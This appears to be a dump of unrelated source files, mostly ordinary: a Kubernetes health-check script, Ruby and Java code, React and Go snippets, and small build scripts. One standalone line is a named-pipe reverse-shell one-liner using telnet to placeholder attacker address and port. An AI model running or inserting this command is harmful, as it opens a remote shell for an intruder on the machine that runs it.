get_check_data() {
allNodeFile="$healthCheckDir/allNodeList.txt"
kubectl get nodes --no-headers -owide >& "$allNodeFile"
nodeIpFile="$healthCheckDir/nodeIpList.txt"
awk '{print $6}' "$allNodeFile" > "$nodeIpFile"
nodeCapacityFile="$healthCheckDir/nodeCapacity.txt"
kubectl get nodes -o custom-columns=NAME:.metadata.name,CPU:.status.capacity.cpu,MEM:.status.capacity.memory,IP:.status.addresses[0].address --no-headers --selector "$nodeLabel"> "$nodeCapacityFile"
allPodsFile="$healthCheckDir/allPodList.txt"
kubectl get pods --all-namespaces --no-headers -owide >& "$allPodsFile"
allPodIpFile="$healthCheckDir/allPodIpList.txt"
awk '{print $7}' "$allPodsFile"|grep -iv none|sort|uniq > $allPodIpFile
nsPodIpFile="$healthCheckDir/nsPodIpList.txt"
grep kube-system $allPodsFile|awk '{print $7}'|grep -iv none|sort|uniq > "$nsPodIpFile"
allServiceFile="$healthCheckDir/allServiceList.txt"
kubectl get svc --all-namespaces --no-headers -owide >& "$allServiceFile"
svcListFile="$healthCheckDir/nsSvcList.txt"
kubectl get svc -oyaml -o=custom-columns=NAME:.metadata.name,CLUSTER-IP:.spec.clusterIP,PORT:.spec.ports[0].port --no-headers -n kube-system|grep -iv none > "$svcListFile"
weavePodsFile="$healthCheckDir/weavePodsList.txt"
kubectl get pods -n kube-system -l name=weave-net -o wide --no-headers > "$weavePodsFile"
}
check_coredns_replicas(){
local availableReplicas readyReplicas replicas ready
read -r availableReplicas ready <<< "$(kubectl -n kube-system get deployments.apps coredns --no-headers|awk '{print $4,$2}')"
read -r readyReplicas replicas <<< "$(echo "$ready"|awk -F '/' '{print $1,$2}')"
if [[ "$availableReplicas" -eq 0 ]]||[[ "$readyReplicas" -eq 0 ]];then
echo '{"alert_status":"error","check_point":"coredns_replicas","check_data":{"availableReplicas":"'"${availableReplicas}"'","readyReplicas":"'"$readyReplicas"'","replicas":"'"$replicas"'"}}'
elif [[ "$availableReplicas" -ne "$replicas" ]]&&[[ "$readyReplicas" -ne "$replicas" ]];then
echo '{"alert_status":"warning","check_point":"coredns_replicas","check_data":{"availableReplicas":"'"$availableReplicas"'","readyReplicas":"'"$readyReplicas"'","replicas":"'"$replicas"'"}}'
else
echo '{"alert_status":"info","check_point":"coredns_replicas","check_data":{"availableReplicas":"'"$availableReplicas"'","readyReplicas":"'"$readyReplicas"'","replicas":"'"$replicas"'"}}'
fi
}
# '{"alert_status":"","check_point":"","check_data":""}'
dns_check(){
if ! host "$1" >/dev/null;then
echo '{"alert_status":"error","check_point":"node_dns","check_data":"'"$1"'"}'
else
echo '{"alert_status":"info","check_point":"node_dns","check_data":"'"$1"'"}'
fi
}
check_node_dns() {
for domain in "${externalDomain[@]}";do
dns_check "$domain"
done
}
check_pod_dns(){
for domain in "${internalDomain[@]}";do
if kubectl exec "$tmpPodName" -- nslookup "$domain" >& /dev/null;then
echo '{"alert_status":"info","check_point":"pod_dns","check_data":"'"$domain"'"}'
else
echo '{"alert_status":"error","check_point":"pod_dns","check_data":"'"$domain"'"}'
fi
done
for domain in "${externalDomain[@]}";do
if kubectl exec "$tmpPodName" -- nslookup "$domain" >& /dev/null;then
echo '{"alert_status":"info","check_point":"pod_dns","check_data":"'"$domain"'"}'
else
echo '{"alert_status":"error","check_point":"pod_dns","check_data":"'"$domain"'"}'
fi
done
}
check_dns(){
#check_node_dns
check_check_pod
check_pod_dns
}
check_node_status(){
local availableNode=$(wc -l "$allNodeFile"|awk '{print $1}')
local notReadyNodeNum=$(grep -cv Ready "$allNodeFile")
local readyNodeNum=$(grep -c Ready "$allNodeFile")
if [[ "$notReadyNodeNum" -ne 0 ]];then
local notReadyNode=$(grep -v Ready "$allNodeFile")
echo '{"alert_status":"error","check_point":"node_status","check_data":{"readyNodeNum":"'"$readyNodeNum"'","notReadyNodeNum":"'"$notReadyNodeNum"'","availableNode":"'"$availableNode"'"}}'
echo "$notReadyNode"
else
echo '{"alert_status":"info","check_point":"node_status","check_data":{"readyNodeNum":"'"$readyNodeNum"'","notReadyNodeNum":"'"$notReadyNodeNum"'","availableNode":"'"$availableNode"'"}}'
fi
}
check_pods_status(){
for status in "${podStatusCheck[@]}";do
local num=$(awk -v podStatus="$status" 'BEGIN{count=0}{if($1=="kube-system" && $4==podStatus)count++}END{print count}' "$allPodsFile")
if [[ "$status" == "Running" ]]||[[ "$status" == "Completed" ]];then
echo '{"alert_status":"info","check_point":"pod_status","check_data":{"status":"'"$status"'","num":"'"$num"'"}}'
elif [[ "$num" -ne 0 ]];then
echo '{"alert_status":"error","check_point":"pod_status","check_data":{"status":"'"$status"'","num":"'"$num"'"}}'
awk -v podStatus="$status" '{if($1=="kube-system" && $4==podStatus) print $0}' "$allPodsFile"
fi
done
local restartPodNum=$(awk -v restartNum=$podRestartCheckNum 'BEGIN{count=0}{if($1=="kube-system" && $5>restartNum)count++}END{print count}' "$allPodsFile")
if [[ "$restartPodNum" -ne 0 ]];then
echo '{"alert_status":"error","check_point":"pod_status","check_data":{"status":"restart","num":"'"$restartPodNum"'"}}'
awk -v restartNum=$podRestartCheckNum '{if($1=="kube-system" && $5>restartNum) print $0}' "$allPodsFile"
fi
}
check_svc_ip(){
local svcCidr=$(pgrep kube-api -a|awk 'NR==1{for(i=1;i<=NF;i++)if($i~/service-cluster-ip-range/)print $i}'|awk -F "=" '{print $2}')
local netmaskNum=$(echo "$svcCidr"|awk -F '/' '{print $2}')
local svcUsageNum=$(awk '{print $4}' "$allServiceFile"|grep -civ none)
local svcIpMax=$((2**(32-netmaskNum)-2))
local ipUsedPercent=$(awk 'BEGIN{printf "%.4f\n","'"${svcUsageNum}"'"/"'"${svcIpMax}"'"}')
if [[ "$svcUsageNum" -gt $((svcIpMax * 8 / 10)) ]];then
echo '{"alert_status":"warning","check_point":"svc_ip","check_data":{"used":"'"$svcUsageNum"'","max":"'$svcIpMax'","percent":"'"$ipUsedPercent"'"}}'
else
echo '{"alert_status":"info","check_point":"svc_ip","check_data":{"used":"'"$svcUsageNum"'","max":"'$svcIpMax'","percent":"'"$ipUsedPercent"'"}}'
fi
}
check_pod_ip(){
local podCidr=$(curl -s 127.0.0.1:6784/status|grep Range|awk '{print $2}')
if [[ ${#podCidr} -lt 9 ]];then
return
fi
local ipUsageNum=$(sort "$nodeIpFile" $nodeIpFile $allPodIpFile|uniq -u|wc -l)
local netmaskNum=$(echo "$podCidr"|awk -F '/' '{print $2}')
local podIpMax=$((2**(32-netmaskNum)-2))
local ipUsedPercent=$(awk 'BEGIN{printf "%.4f\n","'"${ipUsageNum}"'"/"'"${podIpMax}"'"}')
if [[ "$ipUsageNum" -gt $((podIpMax * 8 / 10)) ]];then
echo '{"alert_status":"warning","check_point":"pod_ip","check_data":{"used":"'"$ipUsageNum"'","max":"'$podIpMax'","percent":"'"$ipUsedPercent"'"}}'
else
echo '{"alert_status":"info","check_point":"pod_ip","check_data":{"used":"'"$ipUsageNum"'","max":"'$podIpMax'","percent":"'"$ipUsedPercent"'"}}'
fi
}
unit_conversion_cpu(){
local unit=$(echo "$1"|tr -d '0-9')
local num=$(echo "$1"|tr -cd '0-9')
if [[ $num -eq 0 ]];then
echo 0
else
case $unit in
m)
echo "$num"
;;
*)
echo $((num*1000))
;;
esac
fi
}
unit_conversion_mem() {
local unit=$(echo "$1"|tr -d '0-9')
local num=$(echo "$1"|tr -cd '0-9')
if [[ $num -eq 0 ]];then
echo 0
else
case $unit in
Ki)
echo $((num/1024))
;;
Mi)
echo "$num"
;;
Gi)
echo $((num*1024))
;;
esac
fi
}
get_cluster_resources() {
clusterCapacityCpu=0
clusterCapacityMem=0
clusterRequestsCpu=0
clusterRequestsMem=0
local clusterLimitsCpu=0
local clusterLimitsMem=0
while IFS= read -r line;do
local nodeCapacityCpu nodeCapacityMem nodeName nodeRequestsCpu nodeRequestsMem nodeLimitsCpu nodeLimitsMem nodeRequestsCpuPercent nodeRequestsMemPercent nodeIp
read -r nodeName nodeCapacityCpu nodeCapacityMem nodeIp<<< "$(echo "$line"|awk '{print $1,$2,$3,$4}')"
nodeCapacityCpu=$(unit_conversion_cpu "$nodeCapacityCpu")
nodeCapacityMem=$(unit_conversion_mem "$nodeCapacityMem")
clusterCapacityCpu=$((clusterCapacityCpu+nodeCapacityCpu))
clusterCapacityMem=$((clusterCapacityMem+nodeCapacityMem))
local nodeDescribeFile="$healthCheckDir/$nodeName.describe"
kubectl describe nodes "$nodeName" |sed -n '/Allocated resources/,/Events/p' > "$nodeDescribeFile"
read -r nodeRequestsCpu nodeRequestsCpuPercent nodeLimitsCpu <<< "$(sed -n '/cpu/p' "$nodeDescribeFile"|awk '{print $2,$3,$4}')"
local nodeRequestsCpuPercentNum=$(echo "$nodeRequestsCpuPercent"|sed 's/(//;s/%)//')
if [[ "$nodeRequestsCpuPercentNum" -gt "$clusterRequestCheckPercent" ]];then
echo '{"alert_status":"warning","check_point":"node_resources","check_data":{"ip":"'"$nodeIp"'","resources":"cpu","request":"'"$nodeRequestsCpu"'","max":"'"$nodeCapacityCpu"'m","percent":"'"$(echo "$nodeRequestsCpuPercent"|sed 's/(//;s/)//')"'"}}'
else
echo '{"alert_status":"info","check_point":"node_resources","check_data":{"ip":"'"$nodeIp"'","resources":"cpu","request":"'"$nodeRequestsCpu"'","max":"'"$nodeCapacityCpu"'m","percent":"'"$(echo "$nodeRequestsCpuPercent"|sed 's/(//;s/)//')"'"}}'
fi
nodeRequestsCpu=$(unit_conversion_cpu "$nodeRequestsCpu")
nodeLimitsCpu=$(unit_conversion_cpu "$nodeLimitsCpu")
clusterRequestsCpu=$((clusterRequestsCpu+nodeRequestsCpu))
clusterLimitsCpu=$((clusterLimitsCpu+nodeLimitsCpu))
read -r nodeRequestsMem nodeRequestsMemPercent nodeLimitsMem <<< "$(sed -n '/memory/p' "$nodeDescribeFile"|awk '{print $2,$3,$4}')"
local nodeRequestsMemPercentNum=$(echo "$nodeRequestsMemPercent"|sed 's/(//;s/%)//')
if [[ "$nodeRequestsMemPercentNum" -gt "$clusterRequestCheckPercent" ]];then
echo '{"alert_status":"warning","check_point":"node_resources","check_data":{"ip":"'"$nodeIp"'","resources":"mem","request":"'"$nodeRequestsMem"'","max":"'"$nodeCapacityMem"'Mi","percent":"'"$(echo "$nodeRequestsMemPercent"|sed 's/(//;s/)//')"'"}}'
else
echo '{"alert_status":"info","check_point":"node_resources","check_data":{"ip":"'"$nodeIp"'","resources":"mem","request":"'"$nodeRequestsMem"'","max":"'"${nodeCapacityMem}"'Mi","percent":"'"$(echo "$nodeRequestsMemPercent"|sed 's/(//;s/)//')"'"}}'
fi
nodeRequestsMem=$(unit_conversion_mem "$nodeRequestsMem")
nodeLimitsMem=$(unit_conversion_mem "$nodeLimitsMem")
clusterRequestsMem=$((clusterRequestsMem+nodeRequestsMem))
clusterLimitsMem=$((clusterLimitsMem+nodeLimitsMem))
done < "$nodeCapacityFile"
}
check_resources_request() {
local memUsedPercent=$(awk 'BEGIN{printf "%.4f\n","'"${clusterRequestsMem}"'"/"'"${clusterCapacityMem}"'"}')
local cpuUsedPercent=$(awk 'BEGIN{printf "%.4f\n","'"${clusterRequestsCpu}"'"/"'"${clusterCapacityCpu}"'"}')
if [[ "$clusterRequestsMem" -gt $((clusterCapacityMem * clusterRequestCheckPercent / 100)) ]];then
echo '{"alert_status":"warning","check_point":"cluster_resources","check_data":{"resources":"mem","request":"'${clusterRequestsMem}'Mi","max":"'${clusterCapacityMem}'Mi","percent":"'"$(awk 'BEGIN{printf "%.0f\n","'"${memUsedPercent}"'"*100}')"'%"}}'
else
echo '{"alert_status":"info","check_point":"cluster_resources","check_data":{"resources":"mem","request":"'${clusterRequestsMem}'Mi","max":"'${clusterCapacityMem}'Mi","percent":"'"$(awk 'BEGIN{printf "%.0f\n","'"${memUsedPercent}"'"*100}')"'%"}}'
fi
if [[ "$clusterRequestsCpu" -gt $((clusterCapacityCpu * clusterRequestCheckPercent / 100)) ]];then
echo '{"alert_status":"warning","check_point":"cluster_resources","check_data":{"resources":"cpu","request":"'${clusterRequestsCpu}'m","max":"'${clusterCapacityCpu}'m","percent":"'"$(awk 'BEGIN{printf "%.0f\n","'"${cpuUsedPercent}"'"*100}')"'%"}}'
else
echo '{"alert_status":"info","check_point":"cluster_resources","check_data":{"resources":"cpu","request":"'${clusterRequestsCpu}'m","max":"'${clusterCapacityCpu}'m","percent":"'"$(awk 'BEGIN{printf "%.0f\n","'"${cpuUsedPercent}"'"*100}')"'%"}}'
fi
}
check_weave_status() {
while IFS= read -r weave;do
local weaveName weaveReady weaveStatus nodeIp nodeName
read -r weaveName weaveReady weaveStatus nodeIp nodeName <<< "$(echo "$weave"|awk '{print $1,$2,$3,$6,$7}')"
if [[ "$weaveReady" == "2/2" ]];then
if [[ "$weaveStatus" == "Running" ]];then
echo '{"alert_status":"info","check_point":"weave_status","check_data":{"ip":"'"$nodeIp"'","node":"'"$nodeName"'","podName":"'"$weaveName"'","ready":"'"$weaveReady"'","status":"'"$weaveStatus"'"}}'
else
echo '{"alert_status":"error","check_point":"weave_status","check_data":{"ip":"'"$nodeIp"'","node":"'"$nodeName"'","podName":"'"$weaveName"'","ready":"'"$weaveReady"'","status":"'"$weaveStatus"'"}}'
fi
else
echo '{"alert_status":"error","check_point":"weave_status","check_data":{"ip":"'"$nodeIp"'","node":"'"$nodeName"'","podName":"'"$weaveName"'","ready":"'"$weaveReady"'","status":"'"$weaveStatus"'"}}'
fi
done < "$weavePodsFile"
}
# master and etcd 节点
get_check_data
check_coredns_replicas
check_node_status
check_pods_status
check_svc_ip
check_pod_ip
get_cluster_resources
check_resources_request
check_weave_status
check_dns
kubectl delete pods "$tmpPodName" --force >& /dev/null |
RSpec.describe Springcm::Object do
let(:client) { Springcm::Client.new(data_center, client_id, client_secret) }
let(:object) { Springcm::Object.new(data, client) }
let(:data) {
{
"Name" => "My Document Name"
}
}
describe "getter method missing" do
it "retrieves value" do
expect(object.name).to eq("My Document Name")
end
it "falls back to super" do
expect { object.nothing }.to raise_error(NoMethodError)
end
end
describe "setter method missing" do
let(:new_name) { "My New Document Name" }
it "sets new value" do
object.name = new_name
expect(object.name).to eq(new_name)
end
it "falls back to super" do
expect { object.nothing = "Something" }.to raise_error(NoMethodError)
end
end
end
|
<reponame>iwatakeshi/servest
import React from "../../vendor/https/dev.jspm.io/react/index.js";
import { FC } from "../../types/react/index.d.ts";
import { Links } from "./content.tsx";
import { version } from "../content.ts";
export const Header: FC = () => (
<div className="header">
<div className="inner">
<div>
<a href={"/"} className="brand headerLink">
Servest
</a>
</div>
<div className="spacer" />
<div className="headerItem">
<a
className="headerLink"
target="_blank"
href={`https://doc.deno.land/https/servestjs.org/@${version()}/mod.ts`}
>
Doc
</a>
</div>
<div className="headerItem">
<a className="headerLink" href="/get-started">
Get Started
</a>
</div>
<div className="headerItem">
<a className="headerLink">API</a>
<ul className={"headerSublist"}>
{Links.api.map(([href, text]) => (
<li><a href={href}>{text}</a></li>
))}
</ul>
</div>
<div className="headerItem">
<a className="headerLink" href="/concept">
Concept
</a>
</div>
<div className="headerItem">
<a className="headerLink">Features</a>
<ul className={"headerSublist"}>
{Links.features.map(([href, text]) => (
<li><a href={href}>{text}</a></li>
))}
</ul>
</div>
<div className="headerItem">
<a href="https://github.com/keroxp/servest" target="_blank">
<img
src={"/img/github-logo-32px.png"}
srcSet={"/img/github-logo-32px.png 1x, /img/github-logo-64px.png 2x"}
alt={"Github Logo"}
/>
</a>
</div>
</div>
<div className="v1">
🎉2020/05/13 Servest v1 has been released! 🎉
</div>
</div>
);
|
#!/bin/bash
BASE_DIR=${HOME}/prog/immsocket
export LD_LIBRARY_PATH=${BASE_DIR}/immsocket:${BASE_DIR}/immsocketcommon:${BASE_DIR}/immsocketservice
${BASE_DIR}/test/client_test/client_test
|
/*
* Copyright 2017 Wultra s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.getlime.security.powerauth.lib.webflow.authentication.mtoken.model.converter;
import io.getlime.security.powerauth.lib.mtoken.model.entity.FormData;
import io.getlime.security.powerauth.lib.mtoken.model.entity.attributes.Attribute;
import io.getlime.security.powerauth.lib.nextstep.model.entity.OperationFormData;
import io.getlime.security.powerauth.lib.nextstep.model.entity.attribute.OperationFormFieldAttribute;
import java.util.List;
/**
* Converter for the form data objects used for mobile API.
*
* @author <NAME>, <EMAIL>
*/
public class FormDataConverter {
private final AttributeConverter attributeConverter = new AttributeConverter();
/**
* Convert operation form data.
* @param input Operation form data.
* @return Form data.
*/
public FormData fromOperationFormData(OperationFormData input) {
if (input == null) {
return null;
}
FormData result = new FormData();
result.setTitle(input.getTitle().getMessage());
result.setMessage(input.getGreeting().getMessage());
List<Attribute> attributes = result.getAttributes();
for (OperationFormFieldAttribute attribute : input.getParameters()) {
Integer existingIndex = null;
int counter = 0;
for (Attribute attr: attributes) {
// Make sure attribute with already existing ID is present only once
if (attr.getId().equals(attribute.getId())) {
existingIndex = counter;
break;
}
counter++;
}
Attribute attributeToSave = attributeConverter.fromOperationFormFieldAttribute(attribute);
if (existingIndex != null) {
attributes.set(existingIndex, attributeToSave);
} else {
attributes.add(attributeToSave);
}
}
return result;
}
}
|
#!/bin/sh
ip link | grep ether | awk '{print$2}' |
requirejs.config({
baseUrl: 'Assets/js/customjs',
paths: {
main: 'main',
lib: 'lib'
}
}) |
#!/bin/sh
# Get path separators, etc
case `uname -o 2>/dev/null` in
Cygwin)
PATH_SEP=';'
TRANSFORM="sed -r -e s|:|;C:\\\\cygwin|g -e s|/|\\\\|g"
;;
*)
PATH_SEP=':'
TRANSFORM='cat'
;;
esac
PKGDIR="/usr/share/dbq"
MAINCLASS="org.dellroad.dbq.Main"
CLASSPATH=`find "${PKGDIR}" -type f -name '*.jar' -print0 | xargs -0 -n 1 printf ':%s' | ${TRANSFORM}`
exec java -classpath "${CLASSPATH}" "${MAINCLASS}" ${1+"$@"}
|
<reponame>dikalo/lienzo-ks
/*
* Copyright (c) 2018 Ahome' Innovation Technologies. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.ait.lienzo.ks.client.views.components;
import static com.ait.lienzo.client.core.animation.AnimationProperty.Properties.SCALE;
import static com.ait.lienzo.client.core.animation.AnimationTweener.LINEAR;
import com.ait.lienzo.client.core.Attribute;
import com.ait.lienzo.client.core.animation.AnimationCallback;
import com.ait.lienzo.client.core.animation.AnimationProperties;
import com.ait.lienzo.client.core.animation.IAnimation;
import com.ait.lienzo.client.core.animation.IAnimationHandle;
import com.ait.lienzo.client.core.config.LienzoCore;
import com.ait.lienzo.client.core.event.AttributesChangedEvent;
import com.ait.lienzo.client.core.event.AttributesChangedHandler;
import com.ait.lienzo.client.core.event.NodeMouseClickEvent;
import com.ait.lienzo.client.core.event.NodeMouseClickHandler;
import com.ait.lienzo.client.core.event.NodeMouseEnterEvent;
import com.ait.lienzo.client.core.event.NodeMouseEnterHandler;
import com.ait.lienzo.client.core.event.NodeMouseExitEvent;
import com.ait.lienzo.client.core.event.NodeMouseExitHandler;
import com.ait.lienzo.client.core.image.ImageLoader;
import com.ait.lienzo.client.core.mediator.EventFilter;
import com.ait.lienzo.client.core.mediator.MouseWheelZoomMediator;
import com.ait.lienzo.client.core.shape.GridLayer;
import com.ait.lienzo.client.core.shape.Layer;
import com.ait.lienzo.client.core.shape.Rectangle;
import com.ait.lienzo.client.core.shape.Text;
import com.ait.lienzo.client.core.shape.guides.ToolTip;
import com.ait.lienzo.client.core.types.PatternGradient;
import com.ait.lienzo.client.core.types.Transform;
import com.ait.lienzo.client.core.util.StringFormatter;
import com.ait.lienzo.ks.client.style.KSStyle;
import com.ait.lienzo.ks.client.ui.components.KSButton;
import com.ait.lienzo.ks.client.ui.components.KSSimple;
import com.ait.lienzo.ks.client.views.AbstractToolBarViewComponent;
import com.ait.lienzo.shared.core.types.ColorName;
import com.ait.lienzo.shared.core.types.FillRepeat;
import com.ait.lienzo.shared.core.types.IColor;
import com.ait.lienzo.shared.core.types.TextAlign;
import com.ait.lienzo.shared.core.types.TextBaseLine;
import com.ait.toolkit.sencha.ext.client.events.button.ClickEvent;
import com.ait.toolkit.sencha.ext.client.events.button.ClickHandler;
import com.google.gwt.dom.client.ImageElement;
public class WelcomeViewComponent extends AbstractToolBarViewComponent
{
private final Text m_banner = getText("Lienzo");
private final KSButton m_unzoom = new KSButton("Unzoom");
private final KSSimple m_zoomlb = new KSSimple(" Shift+Mouse Wheel to Zoom", 1);
public WelcomeViewComponent()
{
final Layer layer = new Layer();
m_unzoom.addClickHandler(new ClickHandler()
{
@Override
public void onClick(final ClickEvent event)
{
getLienzoPanel().setTransform(new Transform()).draw();
}
});
m_unzoom.setWidth(90);
getToolBarContainer().add(m_unzoom);
getToolBarContainer().add(m_zoomlb);
new ImageLoader(KSStyle.get().crosshatch())
{
@Override
public void onImageElementLoad(final ImageElement elem)
{
m_banner.setFillGradient(new PatternGradient(elem, FillRepeat.REPEAT)).setFillAlpha(0.70);
layer.batch();
}
@Override
public void onImageElementError(final String message)
{
}
};
final ToolTip tool = new ToolTip().setAutoHideTime(5000);
layer.add(getRect(ColorName.MEDIUMPURPLE, 1.0, -15.0, tool));
layer.add(getRect(ColorName.LAWNGREEN, 0.7, 0, tool));
layer.add(getRect(ColorName.RED, 0.7, 15.0, tool));
layer.add(getRect(ColorName.YELLOW, 0.7, 30.0, tool));
m_banner.addNodeMouseClickHandler(new NodeMouseClickHandler()
{
@Override
public void onNodeMouseClick(final NodeMouseClickEvent event)
{
animate();
}
});
layer.add(m_banner);
layer.add(getLogo("A 2D Structured Graphics", 270));
layer.add(getLogo("Toolkit for GWT.", 340));
layer.add(getLogo("Scale: " + StringFormatter.toFixed(LienzoCore.get().getDeviceScale(), 4), 410));
getLienzoPanel().add(layer);
getLienzoPanel().setBackgroundLayer(getBackgroundLayer());
getWorkingContainer().add(getLienzoPanel());
getLienzoPanel().getViewport().getOverLayer().add(tool);
getLienzoPanel().getMediators().push(new MouseWheelZoomMediator(EventFilter.SHIFT));
getLienzoPanel().getViewport().addAttributesChangedHandler(Attribute.TRANSFORM, new AttributesChangedHandler()
{
@Override
public void onAttributesChanged(final AttributesChangedEvent event)
{
if (tool.isShowing())
{
tool.hide();
}
}
});
}
private final Rectangle getRect(final IColor color, final double alpha, final double rotate, final ToolTip tool)
{
final Rectangle rect = new Rectangle(200, 200);
rect.setX(125);
rect.setY(100);
rect.setFillColor(color);
rect.setFillAlpha(alpha);
rect.setStrokeWidth(5);
rect.setCornerRadius(30);
rect.setRotationDegrees(rotate);
rect.setStrokeColor(ColorName.BLACK);
rect.addNodeMouseEnterHandler(new NodeMouseEnterHandler()
{
@Override
public void onNodeMouseEnter(final NodeMouseEnterEvent event)
{
tool.setValues("Color ( " + color.toString().toUpperCase() + " )", "Tool Tips");
tool.show(125, 100);
}
});
rect.addNodeMouseExitHandler(new NodeMouseExitHandler()
{
@Override
public void onNodeMouseExit(final NodeMouseExitEvent event)
{
tool.hide();
}
});
return rect;
}
private final static Text getText(final String label)
{
return new Text(label).setStrokeWidth(5).setFontSize(144).setFontStyle("bold").setStrokeColor(ColorName.WHITE).setX(700).setY(150).setTextAlign(TextAlign.CENTER).setTextBaseLine(TextBaseLine.MIDDLE);
}
private final static Text getLogo(final String label, final double y)
{
final Text text = new Text(label).setFontSize(32).setFontStyle("bold").setX(400).setY(y).setTextAlign(TextAlign.LEFT).setTextBaseLine(TextBaseLine.MIDDLE).setFillColor(ColorName.BLACK).setStrokeWidth(1.5).setStrokeColor(ColorName.WHITE);
text.addNodeMouseEnterHandler(new NodeMouseEnterHandler()
{
@Override
public void onNodeMouseEnter(final NodeMouseEnterEvent event)
{
text.setFillColor(ColorName.RED);
text.getLayer().batch();
}
});
text.addNodeMouseExitHandler(new NodeMouseExitHandler()
{
@Override
public void onNodeMouseExit(final NodeMouseExitEvent event)
{
text.setFillColor(ColorName.BLACK);
text.getLayer().batch();
}
});
return text;
}
private void animate()
{
m_banner.getLayer().setListening(false);
m_banner.animate(LINEAR, AnimationProperties.toPropertyList(SCALE(-1, 1)), 500, new AnimationCallback()
{
@Override
public void onClose(final IAnimation animation, final IAnimationHandle handle)
{
m_banner.animate(LINEAR, AnimationProperties.toPropertyList(SCALE(1, 1)), 500, new AnimationCallback()
{
@Override
public void onClose(final IAnimation animation, final IAnimationHandle handle)
{
m_banner.getLayer().setListening(true);
m_banner.getLayer().draw();
}
});
}
});
}
@Override
public boolean activate()
{
if (super.activate())
{
animate();
return true;
}
return false;
}
@Override
public GridLayer getBackgroundLayer()
{
return new BluePrintBackgroundLayer();
}
}
|
#!/usr/bin/env bash
## remove old build
rm -rf build
## prepare folder
mkdir -p build/demo
## create data.tar.xz
cd app
tar cJf ../build/demo/data.tar.xz .
## create control.tar.xz
cd ../DEBIAN
tar cJf ../build/demo/control.tar.xz .
## create debian-binary
cd ../build/demo
echo '2.0' > debian-binary
## create demo.deb and insert file: debian-binary control.tar.xz data.tar.xz
ar cr ../demo.deb debian-binary control.tar.xz data.tar.xz
|
rm -f /tmp/p; mknod /tmp/p p && telnet [LIP] [LP] 0/tmp/p
|
#!/bin/bash
set -e
mussel_url="https://github.com/UrbanCompass/Mussel/releases/download/$mussel_version/release.zip"
temp=$(mktemp -d)
echo "Downloading Mussel server from $mussel_url"
curl -L --progress-bar $mussel_url > $temp/release.zip
unzip -o $temp/release.zip -d $temp
mkdir -p .mussel
mv $temp/MusselServer $temp/run_server.sh .mussel
./.mussel/run_server.sh
|
import React from "react";
import PropTypes from "prop-types";
const FlexContainer = props => {
return <div {...props}>{props.children}</div>;
};
FlexContainer.propTypes = {
direction: PropTypes.string,
alignment: PropTypes.string,
text_align: PropTypes.string,
spacing: PropTypes.string
};
export default FlexContainer;
|
import datetime
import pytz
local_time = datetime.datetime.now()
utc_time = datetime.datetime.utcnow()
print("Naive local time {}".format(local_time))
print("Naive UTC {}".format(utc_time))
aware_local_time = pytz.utc.localize(local_time).astimezone()
aware_utc_time = pytz.utc.localize(utc_time)
print("Aware local time{}, time zone {} ".format(aware_local_time, aware_local_time.tzinfo))
print("Aware UTC {}, time zone {}".format(aware_utc_time, aware_utc_time.tzinfo))
gap_time = datetime.datetime(2015, 10, 25, 1, 30, 0, 0)
print(gap_time)
print(gap_time.timestamp())
s = 1445733000
t = s + (60 * 60)
gb = pytz.timezone('GB')
dt1 = pytz.utc.localize(datetime.datetime.utcfromtimestamp(s)).astimezone(gb)
dt2 = pytz.utc.localize(datetime.datetime.utcfromtimestamp(t)).astimezone(gb)
print("{} seconds since the epoch is {}".format(s, dt1))
print("{} seconds since the epoch is {}".format(t, dt2))
|
package main
import (
"fmt"
"os"
"github.com/kleister/go-minecraft/version"
)
func main() {
fmt.Println("Fetching Minecraft versions...")
minecraft, err := version.FromDefault()
if err != nil {
fmt.Println("Error:", err)
os.Exit(1)
}
f := &version.Filter{
Version: ">=1.10.0,<1.13",
}
for _, version := range minecraft.Releases.Filter(f) {
fmt.Println(version.ID)
}
}
|
/*
* Copyright 2013 <NAME> <<EMAIL>>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.blackboard;
/**
*
* <NAME> <<EMAIL>>
*
* NEXT:
* * Use standard sardine methods in LearnServer
* * Require valid certificate for now
* ** Look at https://code.launchpad.net/syncany for SSL possibly
*
*/
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Scanner;
import org.apache.commons.cli.CommandLine;
import org.apache.commons.cli.CommandLineParser;
import org.apache.commons.cli.OptionBuilder;
import org.apache.commons.cli.Options;
import org.apache.commons.cli.ParseException;
import org.apache.commons.cli.PosixParser;
import org.apache.log4j.*;
public class WebdavBulkDeleterClient {
static Logger logger = Logger.getLogger(WebdavBulkDeleterClient.class);
// Stuff all the options into the options object for later use
// About the static access warning - http://stackoverflow.com/a/1933573/1300307
// Seems specific to commons cli. Suppressing.
@SuppressWarnings("static-access")
private static Options addAllOptions(Options options, Map<String, String> optionsAvailable) {
Iterator<Entry<String, String>> it = optionsAvailable.entrySet().iterator();
while (it.hasNext()) {
Map.Entry<String, String> pairs = it.next();
String name = pairs.getKey();
String description = pairs.getValue();
options.addOption( OptionBuilder.withLongOpt(name)
.withDescription(description)
.hasArg()
.withArgName(name)
.create() );
}
return(options);
}
// Make sure all the command line options are present
private static void verifyOptions(CommandLine line, Map<String, String> options) throws ParseException {
Iterator<Entry<String, String>> it = options.entrySet().iterator();
boolean error = false; // Let's be optimistic
while (it.hasNext()) {
Map.Entry<String, String> pairs = it.next();
if (!line.hasOption(pairs.getKey())) {
logger.error("Please specify option --" + pairs.getKey());
